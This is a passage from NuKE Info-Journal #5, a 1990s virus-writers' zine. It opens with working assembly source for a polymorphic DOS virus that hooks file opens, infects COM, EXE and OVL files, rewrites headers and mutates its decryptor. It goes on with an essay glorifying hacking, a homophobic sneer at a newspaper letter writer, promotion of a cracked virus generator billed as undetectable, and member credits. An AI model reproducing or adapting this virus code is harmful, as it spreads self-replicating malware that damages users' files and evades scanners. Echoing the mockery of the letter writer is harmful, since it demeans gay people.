Start_Code-(offset V05-V05_Back) Jcxz DI15 Rep Movsw Jmp short DI25 DI15: Mov Ah, 51h Call Do_21 Add Bx, 0010h Mov Ax, [Si+06h] Dec Ax Dec Ax Stosw Mov Ax, [Si+04h] Add Ax, Bx Stosw Movsw Lodsw Add Ax, Bx Stosw DI25: Pop Di Pop Es Xchg Cx, Ax Mov Cx, offset Virus_End Rep Stosb Jmp short LP32 LP31: Pop Ax Pop Ax LP32: Xor Ax, Ax Clc LP30: Call Restore_Regs Retfar 0002h ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Open_File Proc Near Call Save_Regs Mov Si, Dx OF00: Lodsb Or Al, Al Je OF50 Cmp Al, '.' Jne OF00 Mov Di, offset File_Exts-3 Push Cs Pop Es Mov Cx, 0003h OF10: Push Cx Push Si Mov Cl, 03h Add Di, Cx Push Di OF12: Lodsb And Al, 5Fh Cmp Al, Byte ptr Es:[Di] Jne OF15 Inc Di Loop OF12 Call Infect_File Add Sp, +6 Jmp short OF50 OF15: Pop Di Pop Si Pop Cx Loop OF10 OF50: Call Restore_Regs Ret Open_File Endp ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Infect_File Proc Near Call Save_Regs Mov Ax, 4300h Call Do_21 Jb IF00 Push Cx And Cl, 01h Cmp Cl, 01h Pop Cx Jne H00 And Cl, 0FEh Mov Ax, 4301h Call Do_21 H00: Mov Ax, 3D02h Call Do_21 Jnb IF02 IF00: Jmp IFE4 IF02: Xchg Bx, Ax Push Cs Push Cs Pop Ds Pop Es Mov Ax, 5700h Call Do_21 Push Dx Push Cx And Cl, 1Fh Cmp Cl, 1Fh Je IF05 Mov Dx, offset Exe_Header Mov Cx, offset Exe_Header_End-offset Exe_Header Mov Ah, 3Fh Call Do_21 Jnb IF10 IF05: Stc Jmp IFE2 IF10: Cmp Ax, Cx Jne IF05 Xor Dx, Dx Mov Cx, Dx Mov Ax, 4202h Call Do_21 Or Dx, Dx Jne IF12 Cmp Ax, offset Virus_End+Stack_Size Jb IF05 IF12: Cmp Word ptr Ds:Sign, 'ZM' Je EXE_type COM_type: Cmp Byte ptr Ds:Sign+3, 'O' Je IF05 Cmp Byte ptr Ds:Command_Flag, 00h Je CT00 Sub Ax, offset Virus_End Xchg Dx, Ax Xor Cx, Cx Mov Ax, 4200h Call Do_21 CT00: Mov Si, offset Sign Mov Di, offset Start_Code Movsw Movsw Sub Ax, 0003h Mov Byte ptr Ds:Sign, 0E9h Mov Word ptr Ds:Sign+1, Ax Mov Byte ptr Ds:Sign+3, 'O' Add Ax, (offset V05-V05_Back)+0103H Jmp short IF30 EXE_type: Cmp Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size Je IF05 Cmp Word ptr Ds:Overlay_Num, 0000h Jne IF05 Push Dx Push Ax Mov Cl, 04h Ror Dx, Cl Shr Ax, Cl Add Ax, Dx Sub Ax, Word ptr Ds:Size_Header Mov Si, offset Start_Ip Mov Di, offset Start_Code Movsw Movsw Mov Si, offset Stack_Ss Movsw Movsw Mov Word ptr Ds:Start_Cs, Ax Mov Word ptr Ds:Stack_Ss, Ax Mov Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size Pop Ax Pop Dx Push Ax Add Ax, offset Virus_End+Stack_Size Jnb IF29 Inc Dx IF29: Mov Cx, 512 Div Cx Mov Word ptr Ds:File_Size, Ax Mov Word ptr Ds:Remainder, Dx Pop Ax And Ax, 000Fh Mov Word ptr Ds:Start_Ip, Ax Add Ax, (offset V05-V05_Back) IF30: Mov Word ptr Ds:V00+1, Ax Push Ds Xor Si, Si Mov Ds, Si Mov Ax, Word ptr Ds:[046Ch] Pop Ds Push Bx Mov Byte ptr Ds:V01+1, Ah And Ax, 000Fh Xchg Bx, Ax Shl Bx, 01h Mov Ax, Word ptr [Bx].Random_AL Mov Word ptr Ds:V03, Ax Mov Di, offset Real_End Mov Cx, offset Virus_End Push Cx Cld Rep Movsb Mov Bx, (offset V05-V05_Back) Push Word ptr [Bx] Mov Byte ptr [Bx+V05_Back], 0C3h Push Bx Xor Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h Add Bx, offset Real_End ; Toggle ADD [BX],AL/SUB [BX],AL Call V04 Pop Bx Pop Word ptr [Bx] Mov Dx, offset Real_End Pop Cx Pop Bx Mov Ah, 40h Call Do_21 IFE1: Jb IFE2 Xor Dx, Dx Mov Cx, Dx Mov Ax, 4200h Call Do_21 Jb IFE2 Mov Dx, offset Exe_Header Mov Cx, offset Exe_Header_End-offset Exe_Header Mov Ah, 40h Call Do_21 IFE2: Pop Cx Pop Dx Jb IFE3 Cmp Byte ptr Ds:Command_Flag, 0FFh Je IFE3 Or Cl, 1Fh IFE3: Mov Ax, 5701h Call Do_21 Mov Ah, 3Eh Call Do_21 IFE4: Mov Byte ptr Cs:Command_Flag, 00h Call Restore_Regs Ret Infect_File Endp Do_21 Proc Near Pushf Call Dword ptr Cs:Saved_21 Ret Do_21 Endp Save_Regs: Push Bp Mov Bp, Sp Push Bx Push Cx Push Dx Push Si Push Di Push Ds Push Es Pushf Xchg [Bp+02], Ax Push Ax Mov Ax, [Bp+02] Ret Restore_Regs: Pop Ax Xchg [Bp+02], Ax Popf Pop Es Pop Ds Pop Di Pop Si Pop Dx Pop Cx Pop Bx Pop Bp Ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Random_AL: Inc Al ; 0 Dec Al ; 1 Inc Ax ; 2 Inc Ax Dec Ax ; 3 Dec Ax Add Al, Cl ; 4 Sub Al, Cl ; 5 Xor Al, Cl ; 6 Xor Al, Ch ; 7 Not Al ; 8 Neg Al ; 9 Ror Al, 01h ; A Rol Al, 01h ; B Ror Al, Cl ; C Rol Al, Cl ; D Nop ; E Nop Add Al, Ch ; F ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; COMSPEC_name db 'COMSPEC=' COMMAND_file db '\COMMAND.COM',0 FILE_Exts db 'COMEXEOVL' NUM_Exts equ 3 Start_Code dw 00000h dw 0FFF0h Start_Stack dw ? dw 0FFFFh Org 400h Virus_End: Saved_24 dw ?,? Command_Flag db 0 Temp dw ? Exe_Header: Sign dw ? Remainder dw ? File_Size dw ? Num_Real dw ? Size_Header dw ? Min_Above dw ? Max_Above dw ? Stack_Ss dw ? Stack_Sp dw ? CheckSum dw ? Start_Ip dw ? Start_Cs dw ? Display_Real dw ? Overlay_Num dw ? Exe_Header_End: Real_End: Code Ends End Virus_Begin ;========================================================================== =========================================================================== Evolution of The Cyberculture ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Something's happening here. What it is ain't exactly clear. There's a punk with a computer over there, tellin' me I got to beware... These days, a new breed of young politicized radicals, known as cyberpunks, roam a techno-underground. These cyberpunks are computer cowboys riding the trails of cyberspace. Circumventing software barriers in search of information and services or sometimes just to wreak a little mischievous havoc. They've got the equipment and, they say, the technical know how to slip into virtually any computer system and affect changes with global ramifications. They could effectively cripple the economy or shut down communications systems round the world. Cyberpunks hold the potential for becoming the most powerful countercultural force ever. The government has launched at least two major operations, one in 1990 called Operation Sundevil, to quash the movement. As Secret Service Special Agent John F. Lewis put it, "There are some very talented individuals who are unfortunately misdirecting their energies. But to say they're leaps and bounds ahead of law enforcement personnel isn't true." Our CyberCulture has been built by the best, it perhaps was started by this tall and slender person, wearing black jeans and sporting a pair of John Lennon Specs, we know him as Michael Synergy. Synergy was your basic computer punk, he spent his time exploring cyberspace, staging his own quiet protests by going where he wanted, when he wanted. Synergy became so adept at infiltrating systems that he's become a legend, today he remains something of an icon in the techno-underground. Synergy explains that most of his adventures was to become educated. At that time there wasn't a C-Compiler on microcomputers, so he'd break into Bell Labs just to learn C. Most hackers, Synergy says, use their talents simply to learn. In the very beginning Synergy managed to slip into a supposedly secure top-secret computer network run by the intelligence community and the Department of Defense (DOD), when the DOD took him out of cyber-circulation and brought him in to conduct "penetration testing and security design" for national Security Agency, Secret Service, and FBI, as well as the DOD. Synergy has created a huge spark, that has developed to our current Cyberpunk movement. Science Fiction took off, and we had the beginning of with William Gibson's _Necromancer_ in 1984. The well-known movie _War Games_ was amongst the first to draw ME (Rock Steady) into the Cyberpunk world. Other Cyberpunk-oriented works by writers such as Bruce Sterling (_Schismatrix_, _Islands in the Net_) Pat Cadigan (_Mindplayers_, _Pretty Boy Crossover_) and John Shirly (_Eclipse Crona_) captured SF fans. Gibson also came back with two more novels, _Count Zero_ and _Mona Lisa Overdrive_, as well as an anthology of short stories, _Burning Chrome_. Of course we can say this all began in Ridley Scott's 1980 movie _Bladerunner_ loosely-based on Philip K. Dick's novel "Do Androids Dream of Electric Sheep?" The flood has even fallen into the now so-called cyberpunk bands which have European roots, including Front-242 (Belgium), Laibach (Yugoslavia) and Can (Germany). The flood of culture certainly attracted several punks, many whom now can draw their links to such SF culture. However just like "hacker" the term "cyberpunk" has also come to mean "computer criminal" and cases like the 1988 Internet "worm" have undoubtedly fed the crackdown fever. Created by 25-year-old Robert Morris, the worm shut down some 6,500 computers and caused an estimated $150,000 to $200 million worth of damages to computer systems nationwide. Since then, there have been several instances of what the hackers claim are government attempts to suppress the cyberpunk media. Steve Jackson Games is a case in point. Secret Service agents raided this small Austin- based game manufacturer, publishers of fantasy-role-playing games, in March of 1990. With the recent arrests of numerous hackers for illegal entry and data possession, the battles over control of the electronic frontier and hackers' rights are now being waged in courts. One critical issue is whether information belongs to a given corporation or government or whether it belongs to the world. Certainly what started off as science fiction isn't science fiction any more. The several arrests are meant to make an example, and to perhaps scare ourselves back "into place." Of course this is where the NuKE turning point arrives; rather than hacking ourselves and risking ourselves against the lawman, there is the idea of making a program to perhaps work like ourselves, its mission to bypass software restrictions and perhaps to send a message to all, or to make the world fall upon their knees and go crying to Paul Ferguson for help. I can assure you that the cyberpunk future is still up for grabs, between utopia and dystopia, and whatever it will be it will be a long, hard battle to the end. Rock Steady and The NuKE Associates =========================================================================== =========================================================================== The Truth About Gary... ~~~~~~~~~~~~~~~~~~~~~~~ The following is an actual letter to the editor from the January 18th issue of the _Chicago Tribune_ (sec. 1, p. 12). I am not making this up. For your convenience, I've typed it up just as it appears in the paper: On tolerance OAK PARK --- This is in response to "A battle for the military's soul," by Robert Maginnis. How nice of you, sir, as a lieutenant colonel, to be able to express the views of an organization of close to 1 million employees! I also respect that you, as a stated heterosexual, also know the tendencies of the appoximately 2.56 million homosexuals in the United States. And I, having proudly served seven years in the military, was doing it wrong! I should have, as a homosexual being, been more promiscuous, tried suicide, become an alcoholic, contracted a sexual disease, had close to 500 partners (wow!), and abused children to boot. As to the transfusions of blood, I guess the rest of the world is less risky, with 90 per- cent of HIV infections world- wide being within the heterosexual sphere. Furthermore, the ter- minology you attempt to use, pro-gay sensitivity or re-educa- tion classes, is laughable. All we 're asking is to be treated with respect as human beings. The rest of the world lives with these gay people; why in the hell shouldn't you? Rec- ognize the right to be human in all our ways. Gary Watson ^^^^^^^^^^^ Aha! So the truth finally comes out Gary! We all knew it all along! I'm just glad that you came out of the closet by submitting your letter to a major newspaper... Nowhere Man/NuKE =========================================================================== =========================================================================== Files Included With NuKE Info-Journal #5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DETECTOR.ZIP ~~~~~~~~~~~~ Included with this kit are a few .ZIPs that our two good friends wrote. The first is called DETECTOR.ZIP. It consists of a "strain extractor" by Savage Beast/NuKE. This software will be able to help you to catch your funny viruses when no scanner finds them. Inside the .ZIP there are two files, TEST1.COM and TEST2.COM. They should be infected, then reset your computer and execute the DECTECTOR program. Have fun and use the program in good health! Provided by: Savage Beast GENVIRUS.ZIP ~~~~~~~~~~~~ GenVirus is a virus generator developed in France. This program was ORIGINALLY in French, and "crippled," meaning you had to send the dickweed programmer mondo money for a legit copy. So we gave it to Rock Steady, who cracked the shit out of the file! Being in Canada and stranded in Quebec (French-Pepper land), Rock Steady was able to translate the WHOLE GenVirus program into English! It was tough, being written in C++, but once you live and breath ASM its just a matter of time. Anyhow thanks to Savage Beast for getting us a copy of this program! REMEMBER: ALL the viruses created with GenVirus are UNDETECTABLE! The program ONLY compiles binary code, and attaches the virus to a "dummy" .COM file, but nevertheless it was developed AFTER VCL v1.0, (VCL changed the WHOLE WORLD!), and still goes undetectable, as people never were able to crack the program... Provided by: Savage Beast Cracked by: Rock Steady MCAFEE.STR ~~~~~~~~~~ Is a Product of Screaming Radish from Australia that extracts all virus signatures from any version of McAfee Scan. We are unable to release the product in this info journal as McAfee may restructure their virus format of saving virus signatures, as they can do so, by simple changing one or two small adjustments, therefore this program is not available to the general public. But if you want to get a copy call any of the NuKE Support systems. Provided: Screaming Radish The NuKE Associates =========================================================================== =========================================================================== NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE CREDITS -N E- Nu -NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuK NuKE would like to send its extended thanks to all supporters and members that have put themselves on the line to be with us. Mainly: Death Angel (416) [Thanks for your support! (And source!)] Rock Steady (514) [You have the right to remain silent. You..] Pure Energy (514) [I have a Board? Naaa...] Silent Shadow (514) [What?, Who?, How?, When?, Where?, Why?] Nowhere Man (708) [See, no capital "W" Nowhere!] ARiSToTLE (804) [TRISKAIDEKAPHOBIA - one of a kind dude.] FireCracker (804) [Huh, VGA? Whats VGA? Gimme my money back!] Dark Angel (819) [Can't have a group without you, huh?] Savage Beast (+41) [Hey where's my limo???] Ford Fairlane (+46) [That's for staying on our side!] Tormentor/DY (+46) ["Fame" is truely an evil] Phrozen Doberman (+61) [Gooooood Daaaaay...] Screaming Radish (+61) [Beastiality you say?...humm] TäLöN (+61) [Where's my XXX calendar of the AVers?] Shidaq Arl'hur (+61) [Welcome aboard mate!] The Wierd One (+61) [FCB, how's it taste?] The Dark Elf (+61) [Scan strings, who needs scan strings?] (Ordered by area/country code. We don't like to play favourates!) Anyhow if I missed anyone SIMPLY send me e-mail, no credit ruining, no letter bombs, PLEASE! But I believe I put in everyone that have contributed alot to the NuKE Team, and we thank you in return. NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites --------------------------------------------------------------------------- ├───[BBS Name]───────[Phone Number][Modem]──[SysOp]────────────[NuKE-Net]─┤ Cybernetic Voilence. 514-425-4540 V32Bis Pure Energy American HUB Total Mayhem........+613-ASK-NUKE HST/DS Phrozen Doberman Australian HUB Enigma E:N:U:N.....+41-22-3400329 V32Bis Savage Beast European HUB ├─────────────────────────────────────────────────────────────────────────┤ I listed only the HUB systems, as that is always where you can reach any of us for sure. We do have many other systems, but since this file will not be encrypted I didn't wish to post them for reasons of security. If you wish to join NuKENET simply call up the hub(s) closest to your area, and you will be joined upon to it. Currently NuKENET sites are located in Montreal, Ottawa/Hull, Toronto, Detroit, Chicago, Philadelphia, Richmond, Stockholm, Göteborg, Geneva, Amsterdam, Sofia, Melbourne, and Brisbane. Remember, main rules for NuKENET are that you must call the system up every 2-3 days, anything less will purge you from our net; no illegalities, no codes and material like that (they will be turned over to the appropriate law enforcement!). And we insist on an active system -- one post per month ain't our idea of active. Rock Steady/NuKE ===========================================================================